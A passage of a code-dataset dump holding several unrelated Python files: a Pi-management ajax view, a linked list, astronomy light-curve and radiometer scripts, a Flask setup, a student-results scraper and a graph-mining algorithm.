arguments\n tmpargs = sorted(tmptuple[1].items(), key=operator.itemgetter(0))\n args = [item[1] for item in tmpargs]\n\n # put into our cmd object in the correct order\n cmds.insert(cmdid, {})\n cmds[cmdid]['cmd'] = cmd\n cmds[cmdid]['args'] = args\n\n # command hasn't been run yet, so this is blank\n cmds[cmdid]['result'] = ''\n\n row.requested_commands = json.dumps(cmds)\n DBSession.flush()\n\n return str(cmds)\n\n\n@editCommandResults.get(permission='admin')\ndef view_ajax_get_command_results(request):\n uid = request.matchdict['uid']\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n return {'status': 'error'}\n\n data = json.loads(row.requested_commands)\n\n return {'status': 'OK', 'data': data}\n\n\n@editCommandResults.post(permission='admin')\ndef view_ajax_set_command_results(request):\n uid = request.matchdict['uid']\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n return {'status': 'error'}\n\n row.requested_commands = ''\n DBSession.flush()\n\n return {'status': 'OK'}\n\n\n@AuthUser.post(permission='admin')\ndef view_ajax_set_user_level(request):\n email = request.matchdict['email']\n authorize_user(email)\n return '{\"status\":\"OK\"}'\n\n\n@AuthUser.delete(permission='admin')\ndef view_ajax_delete_user(request):\n email = request.matchdict['email']\n delete_user(email)\n return '{\"status\":\"OK\"}'\n\n","sub_path":"pi_director/views/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"13269465","text":"class LinkedList:\n \"\"\" A singly-linked linked list with a single head reference\n \"\"\"\n def __init__(self):\n self.head = None\n\n def __repr__(self):\n cur = self.head\n s = ''\n while cur is not None:\n s += '[{}]->'.format(cur.item)\n cur = cur.next\n s += 'NULL'\n return s\n\n def append(self, val):\n n = Node(val)\n if self.head is None:\n self.head = n\n return\n\n cur = self.head\n prev = None\n while cur is not None:\n prev = cur\n cur = cur.next\n\n prev.next = n\n\n def reverse(self):\n cur = self.head\n prev = None\n while cur is not None:\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n self.head = prev\n\n def insert(self, val, i):\n cnt = 0\n cur = self.head\n prev = None\n while cur is not None and cnt < i:\n prev = cur\n cur = cur.next\n cnt += 1\n\n n = Node(val)\n n.next = cur\n if prev is None:\n self.head = n\n else:\n prev.next = n\n \n def pop(self, ndx):\n cnt = 0\n cur = self.head\n prev = None\n while cur is not None and cnt < ndx:\n prev = cur\n cur = cur.next\n cnt += 1\n if ndx == cnt and cur is not None:\n if prev is None:\n self.head = self.head.next\n return cur.item\n else:\n prev.next = cur.next\n return cur.item\n\n def remove(self, val):\n cur = self.head\n prev = None\n while cur is not None:\n if cur.item == val:\n if prev is None:\n self.head = self.head.next\n else:\n prev.next = cur.next\n return\n prev = cur\n cur = cur.next\n\n\n\n\nclass Node:\n def __init__(self, val=None):\n self.item = val\n self.next = None\n\nif __name__ == \"__main__\":\n print('LinkedLists')\n l = LinkedList()\n for i in range(5):\n l.append(i)\n print(repr(l))\n l.insert('i10', 10)\n l.insert('i4', 4)\n l.insert('i0', 0)\n print(l)\n l.reverse()\n print(repr(l))\n l.reverse()\n print(l.pop(0))\n print(l.pop(4))\n print(l.pop(10))\n print(l)\n l.remove('i10')\n print(l)\n l.remove(0)\n l.remove(2)\n print(l)\n","sub_path":"llists.py","file_name":"llists.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90245774","text":"#Author: Emma Carli \n#INITIALISATION\n#clear variables?\nimport numpy as np\nimport interpacf\nimport astropy.stats\nfrom numpy import mean, sqrt, square\nfrom astropy.table import Table \nk=-1 #k will be the star number in our list (the order is not significant)\nrmstable=np.zeros((66,2)) #This will be a dataset with the star's EPIC ID as the first column, and the other columns are the periods (rough and regular) and their error\nstartlist=np.genfromtxt(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\Gaussian Processes\\start.txt\")\n\n\n# =============================================================================\n#PICKING A STAR\nf = open(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\STARS.txt\") #Open the list of stars considered in this project\nstar = f.readline() #Read the first line of the text file\nwhile star: #Keep reading one line at a time till you get to the end of the list.\n starlist=list(star) #Turn the star's name into a list\n del starlist[9] #Remove the \"return\" character\n starint=int(float(star))\n #Here we create the link to the POLAR txt file corresponding to this star\n linklist=list(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\Polar Detrended LCs\\ktwo211418016c16_lpd_LC.txt\") #Take a random link to a POLAR txt file and make it a list\n newlinklist = linklist[:91] + starlist +linklist[100:] #Replace the EPIC ID in the link using the stellar ID list\n link=''.join(newlinklist) #Create the link\n# ============================================================================= \n \n # =============================================================================\n #RETRIEVING THE LIGHT CURVE\n if starint in [211699606, 212006344, 211427097]:\n linklist=list('https://archive.stsci.edu/hlsps/k2sff/c16/211300000/90837/hlsp_k2sff_k2_lightcurve_211390837-c16_kepler_v1_llc-default-aper.txt') #Take a random link to an EVEREST FITS file and make it a list\n newlinklist = linklist[:42] + starlist[0:4] + linklist[46:52] + starlist[4:9] + linklist[57:83] + starlist +linklist[92:] #Fill in EPIC ID occurrences in the link using the stellar ID list\n link=''.join(newlinklist) #Create the link\n data=np.genfromtxt(link, skip_header=1, delimiter=',')\n time=data[:,0]\n flux=data[:,1] \n error=np.zeros_like(flux)\n else:\n #Here we create the link to the POLAR txt file corresponding to this star\n linklist=list(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\Polar Detrended LCs\\ktwo211418016c16_lpd_LC.txt\") #Take a random link to a POLAR txt file and make it a list\n newlinklist = linklist[:90] + starlist +linklist[99:] #Replace the EPIC ID in the link using the stellar ID list\n link=''.join(newlinklist) #Create the link\n data=np.genfromtxt(link) #Here the column data from the POLAR txt file is retrieved\n time=data[:,0] #And the two colums are separated\n flux=data[:,1] \n error=data[:,2]\n # =============================================================================\n \n # =============================================================================\n #REMOVAL OF START AND/OR END\n if starint in [211814413, 211827122, 211696686] :\n flux=flux[(time <= 58170)]\n time = time[(time <= 58170)]\n if starint in startlist:\n flux=flux[(time >= 58100)]\n time = time[(time >= 58100)]\n # =============================================================================\n \n # =============================================================================\n #DATA CLEANING \n time=time[~np.isnan(flux)] #Remove timestamps corresponding to flux NaNs\n flux = flux[~np.isnan(flux)] #Remove NaNs in the flux\n sigmaclip=astropy.stats.sigma_clip(flux,3) #Perform sigma-clipping with sigma=3, value chosen arbitrarily\n mask=sigmaclip.mask #Retrieve the boolean mask of the sigma clipping\n flux=flux[~mask] #Remove the outliers from the flux\n time=time[~mask] #Remove the timestamps corresponding to the outliers\n flux=flux-(np.median(flux)) #Normalise to 0 to be able to perform ACF (McQuillan et al. 2013)\n [time,flux]=interpacf.interpolate_missing_data(time,flux) #Interpolate data in case of non regular long cadences\n # =============================================================================\n \n \n # ============================================================================= \n #REBINNING \n #Downsample the data to 2 hours instead of 30 minutes (4 times smaller dataset)\n end = 4 * int(len(flux)/4) \n flux=np.mean(flux[:end].reshape(-1, 4), 1)\n time=np.mean(time[:end].reshape(-1, 4), 1)\n # =============================================================================\n \n rms = sqrt(mean(square(flux)))\n \n k=k+1 #Go to the next line in the table containing rms\n #Fill in the table : ID of the star followed by the stellar activity rms\n rmstable[k][0]=int(star)\n rmstable[k][1]=rms\n \n star = f.readline() #Proceed to reading next line of text file \nf.close() #Close the file (the list of stars)\n\n\nrms_table=Table(rmstable,names=['ID','RMS']) #Make an astropy table with the data for easy handling\nrms_table.write('RMS Table.html') #Retrieve the astropy table as an html table","sub_path":"Auxiliary_Codes/RMS finder.py","file_name":"RMS finder.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"304288155","text":"from flask import Flask\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\napp = Flask(__name__)\napp.config.from_object('config')\n\n\nfile_handler = TimedRotatingFileHandler('app/log/astronomer.log', when=\"W0\", backupCount=0)\nfile_handler.setLevel(logging.INFO)\nfile_handler.setFormatter(logging.Formatter('%(asctime)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S'))\napp.logger.addHandler(file_handler)\napp.logger.setLevel(logging.INFO)\napp.logger.info('---------------------astronomer startup-------------------------')\n\nif __name__ == '__main__':\n app.run()\n\nfrom app import views\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"423307370","text":"import numpy as np\nimport numpy.ma as ma\nimport os\nimport re\nfrom datetime import timedelta, datetime\nimport pdb\n\ndef get_am_templates(time, wvr, angle):\n # Load fast file; first 4 rows are text; columns 3, 7, 11, 15 are the\n # A channels, columns 5, 9, 13, 17 are B, and column 18 is the elevation\n if wvr == 'wvr1':\n datafile = f'wvr1/{time}_skyDip_fast.txt'\n elif wvr == 'wvr2':\n datafile = f'wvr2/{time}_skyDip_fast.txt'\n data_el = np.loadtxt(datafile, skiprows=4, usecols=(18))\n # The indices where it is pointing straight up are\n zenith = np.where(np.logical_and(data_el > angle-0.5, data_el < angle+0.5)) \n data_A = np.loadtxt(datafile, skiprows=4, usecols=(3,7,11,15))\n data_B = np.loadtxt(datafile, skiprows=4, usecols=(5,9,13,17))\n data_C = np.loadtxt(datafile, skiprows=4, usecols=(2,6,10,14))\n data_H = np.loadtxt(datafile, skiprows=4, usecols=(4,8,12,16))\n # Picks out rows where channel A is being read (at zenith), do same with B\n data_A = np.array([row for row in data_A[zenith] if row[0] > 0])\n data_B = np.array([row for row in data_B[zenith] if row[0] > 0])\n data_C = np.array([row for row in data_C[zenith] if row[0] > 0])\n data_H = np.array([row for row in data_H[zenith] if row[0] > 0])\n # Convert to Rayleigh Jeans source brightness temperature\n # First, throw away last data rows if necessary, to make data arrays same size\n min_dim = min([len(data_A), len(data_B), len(data_C), len(data_H)])\n data_A = data_A[:min_dim,:]\n data_B = data_B[:min_dim,:]\n data_C = data_C[:min_dim,:]\n data_H = data_H[:min_dim,:]\n # Now using formulae in WVR Operation Manual page 10\n V_ref = (data_H + data_C)/2\n T_hot = 363.15 # In K, with error 0.01 K\n T_cold = 283.15 # In K, with error 0.01 K\n T_ref = (T_hot + T_cold)/2\n G = (data_H - data_C)/(T_hot - T_cold)\n data_A = T_ref + (data_A - V_ref)/G\n data_B = T_ref + (data_B - V_ref)/G\n # Throw away negative values\n data_el[data_el < 0] = np.nan\n data_A[data_A < 0] = np.nan\n data_B[data_B < 0] = np.nan\n filename = f'./{wvr}_am_{angle}deg/{time}_{angle}deg.dat'\n with open(filename, 'w+') as f:\n data0 = (np.mean(data_A[:,0])+np.mean(data_B[:,0]))/2\n data1 = (np.mean(data_A[:,1])+np.mean(data_B[:,1]))/2\n data2 = (np.mean(data_A[:,2])+np.mean(data_B[:,2]))/2\n data3 = (np.mean(data_A[:,3])+np.mean(data_B[:,3]))/2\n f.write('1.25 1.50 {0}\\n'.format(data0))\n f.write('3.25 2.50 {0}\\n'.format(data1))\n f.write('5.5 2.00 {0}\\n'.format(data2))\n f.write('7.25 1.50 {0}'.format(data3))\n","sub_path":"get_am_templates.py","file_name":"get_am_templates.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417330340","text":"#All imports\nimport requests\nimport http.client \nfrom time import sleep\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport os\nimport timeit\nimport sys\nimport winsound\n####################################################################\n#Random initializations\nglobal gradesum\n\ncount=0 \n\nccurl=0 #starting college code\nccend=100 #ending college code\n\nurlerror=0 #number of urlerrors,will check if its greater than 6 and terminate\n\nstart_time = timeit.default_timer()\n\n\nvar1=0\nvar2=0\n\nskip=0\n\nusn=92\nuusn=\"\"\nnuerror=0\nccycle=\"P\"\ncdone=\"false\"\n\n#college lists\nclist=[\"1cd\",\"1cg\",\"1ce\",\"1dt\",\"1ds\",\"1db\",\"1da\",\"1cc\",\"1gv\",\"1ec\",\"1ep\",\"1ew\",\"1gs\",\"1gc\",\"1ga\",\"1gd\",\"1sk\",\"1gg\",\"1hk\",\"1hm\",\"1ic\",\"1ii\",\"1jv\",\"1js\",\"1jt\",\"1ks\",\"1ki\"]\n#clist=[\"1KS\"]\n####################################################################\n\n#Urls\nurl1=\"http://results.vtu.ac.in/vitaviresultcbcs/resultpage.php\"\nurl5=\"\"\n\nurl31=\"16\"\nurl32=\"CS\"\nurl3=url31+url32\nsusn=\"\"\n\n\ngradesum=0\nln=0\n#####################################################################\n#Calulations\n\n#loop through all given colleges\nwhile ln<=2:\n\t#Get current college code \n\t#ucc=(clist[ccurl]).upper()\n\tucc=\"1KS\"\n\ttext_file = open(\"00-sen-Sem1.txt\", \"a\")\n\t\t\n\tif(cdone==\"done\" or skip>5):\n\t\tprint(\"\\nGoing to next college\")\n\t\ttext_file.close()\n\t\ttext_file = open(\"00-17.txt\", \"a\")\n\t\t#No more usn's remaining,go to next college\n\t\tcdone=\"false\"\n\t\tccurl=ccurl+1\n\t\tusn=0\n\t\tnuerror=0\n\t\t\n\telif(cdone==\"y\"):\n\t\tsys.exit(0)\n\telse:\n\t\tsgpa=0\n\t\t\n\n\t\tln=ln+1\n\t\tprint(ln)\n\t\t\n\t\tnuerror=0\n\t\tusn=92\n\t\tskip=0\n\t\t#Get VTU URL\n\t\t#usn=usn+1\n\t\t\n\t\tif(usn==93):\n\t\t\tsys.exit(0)\n\t\telif(usn<10):\n\t\t\tif(usn>8):\n\t\t\t\tsys.exit(0)\n\t\t\tuusn=\"00\"+str(usn)\n\t\telif(usn<100):\n\t\t\tuusn=\"0\"+str(usn)\n\t\telse:\n\t\t\tuusn=str(usn)\n\t\turl=url1+ucc+url3+uusn+url5\n\t\tsusn=ucc+url3+uusn\n\t\tultusn=ucc+url3+uusn+url5\n\t\t\n\t\tprint(ultusn)\n\t\ttry:\n\t\t\tresponse =requests.post('http://localhost/vt3.html', data={'usn':ultusn}, timeout=30)\n\t\t\t\t\n\t\t\tsoup = BeautifulSoup(response.content,\"html.parser\")\n\t\t\t\n\t\t\ttables = soup.findChildren(\"div\", {\"class\":\"divTableBody\"})\n\n\t\t\tnames=soup.find(\"td\", {\"style\":\"padding-left:15px\"})\n\t\t\tfor name in names:\n\t\t\t\tname2=name.string\n\t\t\t\tprint(name2.replace(\":\",\"\"))\n\t\n\t\t\trows = tables[0].findChildren(\"div\", {\"class\":\"divTableRow\"})\n\t\n\t\t\tll=1\n\t\t\ti1=i2=i3=i4=i5=i6=i7=i8=0;\n\t\t\tsgpa=0\n\t\t\tvaluen=4\n\t\t\tvaluesum=0\n\t\t\tgradesum=0\n\t\t\t\n\t\t\ti1 = rows[1].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti2 = rows[2].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti3 = rows[3].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti4 = rows[4].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti5 = rows[5].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti6 = rows[6].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti7 = rows[7].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti8 = rows[8].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\tvar1=0\n\t\t\tfor row in rows:\n\t\t\t\tvolume = row.findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\n\t\t\t\tif var1!=0:\n\t\t\t\t\tvalue=int(volume)\n\t\t\t\t\t\n\t\t\t\t\tif (var1==7 or var1==8):\n\t\t\t\t\t\tvar2=2\n\t\t\t\t\telse:\n\t\t\t\t\t\tvar2=4\n\t\n\t\n\t\t\t\t\tif(value>=40 and value<45):\n\t\t\t\t\t\tvalue2=4\n\t\t\t\t\telif(value>=45 and value<50):\n\t\t\t\t\t\tvalue2=5\n\t\t\t\t\telif(value>=50 and value<60):\n\t\t\t\t\t\tvalue2=6\n\t\t\t\t\telif(value>=60 and value<70):\n\t\t\t\t\t\tvalue2=7\n\t\t\t\t\telif(value>=70 and value<80):\n\t\t\t\t\t\tvalue2=8\n\t\t\t\t\telif(value>=80 and value<90):\n\t\t\t\t\t\tvalue2=9\n\t\t\t\t\telif(value>=90):\n\t\t\t\t\t\tvalue2=10\n\t\t\t\t\telif(value<40):\n\t\t\t\t\t\tvalue2=0\n\t\t\t\t\tgradesum=gradesum+(value2*var2)\n\t\t\n\t\n\t\t\t\tvar1=var1+1\n\t\t\tsgpa=round((gradesum/28),2)\n\n\t\t\tif(sgpa==0):\n\t\t\t\tnuerror=nuerror+1\n\t\t\t\tif(nuerror>6):\n\t\t\t\t\tcdone=\"done\"\n\t\t\t\t\tbreak\n\t\n\t\t\telse:\n\t\t\t\tprint ('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}'.format(ucc,susn,sgpa,i1,i2,i3,i4,i5,i6,i7,i8))\n\t\t\t\ttext_file.write('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}\\n'.format(ucc,susn,sgpa,i1,i2,i3,i4,i5,i6,i7,i8))\n\t\t\t\ttext_file.close()\n\t\n\t\t\t\ttext_file = open(\"00-Sem1.txt\", \"a\")\n\t\t\t\tnuerror=0\n\t\t\t\tskip=0\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tusn=usn-1\n\t\t\tnuerror=nuerror+1\n\t\t\tif(nuerror>3):\n\t\t\t\tif(skip>4):\n\t\t\t\t\tcdone=\"y\"\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Skipping usn \")\n\t\t\t\t\tskip=skip+1\n\t\t\t\t\tusn=usn+1\n\t\t\t\t\tnuerror=0\n\t\t\tprint(\"Error\")\n\t\t\tcontinue\n\n\t\ndef getMarks(cell,valuen):\n\tglobal gradesum\n\tvalue = int(cell.string)\n\tif(value>=40 and value<45):\n\t\t\tvalue2=4\n\tif(value>=45 and value<50):\n\t\t\tvalue2=5\n\tif(value>=50 and value<60):\n\t\t\tvalue2=6\n\tif(value>=60 and value<70):\n\t\t\tvalue2=7\n\tif(value>=70 and value<80):\n\t\t\tvalue2=8\n\tif(value>=80 and value<90):\n\t\t\tvalue2=9\n\tif(value>=90):\n\t\t\tvalue2=10\n\tif(value<40):\n\t\t\tvalue2=0\n\tgradesum=gradesum+(value2*valuen)\n\t#return gradesum\n\t\nprint(\"My watch has ended\")\nelapsed = timeit.default_timer() - start_time\nprint(elapsed)\n","sub_path":"Programs/17-21/th.py","file_name":"th.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"351167871","text":"import copy\nimport tracemalloc\n\nimport sys\nsys.setrecursionlimit(15000)\ntracemalloc.start()\nexternal_utility = dict()\n\nclass InputGraph:\n def __init__(self):\n self.vertices = []\n self.edges = []\n self.adjacency = dict()\n self.dfs_order = dict()\n self.time = 0\n\n def dfs_visit(self, u):\n self.dfs_order[u] = self.time\n self.time += 1\n try:\n _ = self.adjacency[u]\n except KeyError:\n return\n for v in self.adjacency[u]:\n if self.dfs_order[v] == -1:\n self.dfs_visit(v)\n\n def __repr__(self) -> str:\n return \"\\nVertices:\" + str(self.vertices) + \"\\nEdges: \" + str(self.edges) \\\n + \"\\nDFS order: \" + str(self.dfs_order) + \"\\nAdjacency List: \" + str(self.adjacency) + \"\\n\"\n\n\nclass Graph:\n def __init__(self):\n self.vertices = dict()\n self.adjacency = dict()\n self.utility = -float('inf')\n\n def graph_utility(self):\n if self.utility > -float('inf'):\n return self.utility\n utility = 0.0\n for u in self.adjacency:\n for e in self.adjacency[u]:\n v, edge_label, internal_utility = e\n if u > v:\n continue\n u_label = self.vertices[u]\n v_label = self.vertices[v]\n if u_label <= v_label:\n utility += internal_utility * external_utility[(u_label, v_label, edge_label)]\n else:\n utility += internal_utility * external_utility[(v_label, u_label, edge_label)]\n self.utility = utility\n return utility\n\n def __repr__(self) -> str:\n return \"\\nVertices:\" + str(self.vertices) \\\n + \"\\nAdjacency List: \" + str(self.adjacency) + \"\\n\"\n\n\ninput_graphs =[]\n\nfile = open(\"NCI1log.txt\").readlines()\nmode = -1\nfor line in file:\n if line[0] == 't':\n mode += 1\n input_graphs.append(InputGraph())\n continue\n elif mode == -1:\n vertex1, vertex2, edge, utility = line.split(\" \")\n vertex1 = int(vertex1)\n vertex2 = int(vertex2)\n edge = int(edge)\n utility = float(utility)\n external_utility[(vertex1, vertex2, edge)] = utility\n elif line[0] == 'v':\n _, vertex, label = line.split(\" \")\n vertex = int(vertex)\n label = int(label)\n input_graphs[mode].vertices.append((vertex,label))\n input_graphs[mode].dfs_order[vertex] = -1\n elif line[0] == 'e':\n _, vertex1, vertex2, label, utility = line.split(\" \")\n vertex1 = int(vertex1)\n vertex2 = int(vertex2)\n label = int(label)\n utility = float(utility)\n if vertex1 in input_graphs[mode].adjacency:\n input_graphs[mode].adjacency[vertex1].append(vertex2)\n else:\n input_graphs[mode].adjacency[vertex1] = [vertex2]\n if vertex2 in input_graphs[mode].adjacency:\n input_graphs[mode].adjacency[vertex2].append(vertex1)\n else:\n input_graphs[mode].adjacency[vertex2] = [vertex1]\n\n input_graphs[mode].edges.append((vertex1, vertex2, label, utility))\n\n\ngraphs = []\ncc=1\nfor g in input_graphs:\n print(cc)\n cc+=1\n for v, _ in g.vertices:\n if g.dfs_order[v] == -1:\n g.dfs_visit(v)\n graph = Graph()\n for v in g.vertices:\n graph.vertices[g.dfs_order[v[0]]] = v[1]\n for e in g.edges:\n if g.dfs_order[e[0]] in graph.adjacency:\n graph.adjacency[g.dfs_order[e[0]]].append((g.dfs_order[e[1]], e[2], e[3]))\n else:\n graph.adjacency[g.dfs_order[e[0]]] = [(g.dfs_order[e[1]], e[2], e[3])]\n if g.dfs_order[e[1]] in graph.adjacency:\n graph.adjacency[g.dfs_order[e[1]]].append((g.dfs_order[e[0]], e[2], e[3]))\n else:\n graph.adjacency[g.dfs_order[e[1]]] = [(g.dfs_order[e[0]], e[2], e[3])]\n graphs.append(graph)\n\nmin_util = 0.0\nfor g in graphs:\n min_util += g.graph_utility()\n print(g.graph_utility())\nmin_util *= 0.09\nprint(\"----------------------------------\")\nprint(min_util)\n\ndef RightMostPath(code):\n adj = dict()\n ur = 0\n for c in code:\n ur = max(ur, c[0])\n ur = max(ur, c[1])\n if c[1] > c[0]:\n adj[c[1]] = c[0]\n result = [ur]\n u = ur\n while u != 0:\n u = adj[u]\n result.append(u)\n return ur, list(reversed(result))\n\n\ndef get_utility(code, graph, isomorphism):\n result = 0.0\n for c in code:\n ext_utility = 0.0\n u, v, u_label, v_label, edge_label = c\n if u_label < v_label:\n ext_utility = external_utility[(u_label, v_label, edge_label)]\n else:\n ext_utility = external_utility[(v_label, u_label, edge_label)]\n iso_u, iso_v = isomorphism[u], isomorphism[v]\n int_utility = 0.0\n for e in graph.adjacency[iso_u]:\n if e[0] == iso_v and e[1] == edge_label:\n int_utility = e[2]\n result += ext_utility*int_utility\n return result\n\n\ndef RightMostExtensions(code, graphs):\n result = dict()\n for i in range(len(graphs)):\n graph = graphs[i]\n temp_result = dict()\n if code.__len__() == 0:\n for u in graph.adjacency:\n for e in graph.adjacency[u]:\n v, edge_label, internal_utility = e\n u_label = graph.vertices[u]\n v_label = graph.vertices[v]\n utility = 0.0\n if u_label < v_label:\n utility = internal_utility * external_utility[(u_label, v_label, edge_label)]\n else:\n utility = internal_utility * external_utility[(v_label, u_label, edge_label)]\n if (0, 1, u_label, v_label, edge_label) in temp_result:\n temp_result[(0, 1, u_label, v_label, edge_label)] = max(utility, temp_result[(0, 1, u_label, v_label, edge_label)])\n else:\n temp_result[(0, 1, u_label, v_label, edge_label)] = utility\n else:\n isomorphisms = subgraphIsomorphisms(code, graph)\n u, R = RightMostPath(code)\n for isomorphism in isomorphisms:\n for v in R:\n if u == v:\n continue\n iso_u = isomorphism[u]\n iso_v = isomorphism[v]\n for e in graph.adjacency[iso_u]:\n if e[0] != iso_v:\n continue\n edge_label = e[1]\n exists = False\n for c in code:\n if c[0] == u and c[1] == v and c[4] == edge_label:\n exists = True\n elif c[0] == v and c[1] == u and c[4] == edge_label:\n exists = True\n if not exists:\n new_code = copy.deepcopy(code)\n new_code.append((u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label))\n utility = get_utility(new_code, graph, isomorphism)\n if (u, v, graph.vertices[iso_u], graph.vertices[iso_u], edge_label) in temp_result:\n temp_result[(u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label)] = max(utility, temp_result[(u, v, graph.vertices[iso_v], graph.vertices[iso_v], edge_label)])\n else:\n temp_result[(u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label)] = utility\n ur = u\n for u in R:\n iso_u = isomorphism[u]\n for e in graph.adjacency[iso_u]:\n iso_v, edge_label, int_utility = e\n if iso_v in isomorphism.values():\n continue\n u_label, v_label = graph.vertices[iso_u], graph.vertices[iso_v]\n new_code = copy.deepcopy(code)\n new_code.append((u, ur + 1, u_label, v_label, edge_label))\n isomorphism_ = copy.deepcopy(isomorphism)\n isomorphism_[ur + 1] = iso_v\n utility = get_utility(new_code, graph, isomorphism_)\n if (u, ur+1, u_label, v_label, edge_label) in temp_result:\n temp_result[(u, ur+1, u_label, v_label, edge_label)] = max(utility,temp_result[(u, ur+1, u_label, v_label, edge_label)])\n else:\n temp_result[(u, ur+1, u_label, v_label, edge_label)] = utility\n\n for key in temp_result:\n if key in result:\n utility, gwu = result[key]\n result[key] = (temp_result[key] + utility, gwu + graph.graph_utility())\n else:\n result[key] = (temp_result[key], graph.graph_utility())\n return result\n\n\ndef buildGraph(code):\n graph = Graph()\n for tuple in code:\n u, v, u_label, v_label, edge_label = tuple\n graph.vertices[u] = u_label\n graph.vertices[v] = v_label\n if u in graph.adjacency:\n graph.adjacency[u].append((v, edge_label, 0.0))\n else:\n graph.adjacency[u] = [(v, edge_label, 0.0)]\n if v in graph.adjacency:\n graph.adjacency[v].append((u, edge_label, 0.0))\n else:\n graph.adjacency[v] = [(u, edge_label, 0.0)]\n return graph\n\n\ndef minTuple(tuple1, tuple2):\n u1, v1, u1_label, v1_label, edge1label = tuple1\n u2, v2, u2_label, v2_label, edge2label = tuple2\n if u1 == u2 and v1 == v2:\n if u1_label < u2_label:\n return tuple1\n elif u1_label > u2_label:\n return tuple2\n elif v1_label < v2_label:\n return tuple1\n elif v1_label > v2_label:\n return tuple2\n elif edge1label < edge2label:\n return tuple1\n return tuple2\n else:\n if u1 < v1 and u2 < v2: # both forward edge\n if v1 < v2:\n return tuple1\n elif v1 == v2 and u1 > u2:\n return tuple1\n return tuple2\n if u1 > v1 and u2 > v2: # both backward edge\n if u1 < u2:\n return tuple1\n elif u1 == u2 and v1 < v2:\n return tuple1\n return tuple2\n if u1 < v1 and u2 > v2: # tuple1 forward tuple2 backward\n if v1 <= u2:\n return tuple1\n return tuple2\n if u1 > v1 and u2 < v2: # tuple1 backward tuple2 forward\n if u1 < v2:\n return tuple1\n return tuple2\n\n\ndef minExtension(tuples):\n result = None\n for t in tuples:\n if result is None:\n result = t\n else:\n result = minTuple(result, t)\n return result\n\n\ndef isCannonical(code):\n graph = buildGraph(code)\n c = []\n for i in range(len(code)):\n extension = minExtension(RightMostExtensions(c, [graph]))\n if minTuple(extension, code[i]) != code[i]:\n return False\n c.append(extension)\n return True\n\n\ndef subgraphIsomorphisms(code, graph):\n isomorphisms = []\n l0 = code[0][2]\n for v in graph.vertices:\n if graph.vertices[v] == l0:\n isomorphisms.append({0: v})\n for tuple in code:\n u, v, u_label, v_label, edge_label = tuple\n temp_isomorphisms = []\n for isomorphism in isomorphisms:\n if v > u:\n iso_u = isomorphism[u]\n try:\n _ = graph.adjacency[iso_u]\n except KeyError:\n continue\n for e in graph.adjacency[iso_u]:\n iso_v, iso_edge_label, _ = e\n if iso_v not in isomorphism.values() and graph.vertices[iso_v] == v_label and edge_label == iso_edge_label:\n new_iso = copy.deepcopy(isomorphism)\n new_iso[v] = iso_v\n temp_isomorphisms.append(new_iso)\n else:\n iso_u = isomorphism[u]\n iso_v = isomorphism[v]\n for e in graph.adjacency[iso_u]:\n c_iso_v, c_iso_edge_label, _ = e\n if c_iso_v == iso_v and edge_label == c_iso_edge_label:\n temp_isomorphisms.append(copy.deepcopy(isomorphism))\n isomorphisms = temp_isomorphisms\n return isomorphisms\n\nimport time\n\nhup, candidates= 0, 0\ndef GSpan(code, graphs, min_util, t):\n global hup, candidates\n code = copy.deepcopy(code)\n extentions = RightMostExtensions(code, graphs)\n for key in extentions:\n utility, gwu = extentions[key]\n new_code = copy.deepcopy(code)\n new_code.append(key)\n print(time.time()-t)\n if isCannonical(new_code) and gwu > min_util:\n if utility > min_util:\n print(new_code, utility, gwu, isCannonical(new_code))\n hup += 1\n GSpan(new_code, graphs, min_util, t)\n\n\nt = time.time()\nGSpan([], graphs, min_util, t)\nprint(\" \", time.time() - t, hup, candidates)\ncurrent, peak = tracemalloc.get_traced_memory()\nprint(f\"Current memory usage is {current / 10**6}MB; Peak was {peak / 10**6}MB\")\ntracemalloc.stop()\nprint(5)","sub_path":"main GWU.py","file_name":"main GWU.py","file_ext":"py","file_size_in_byte":13408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 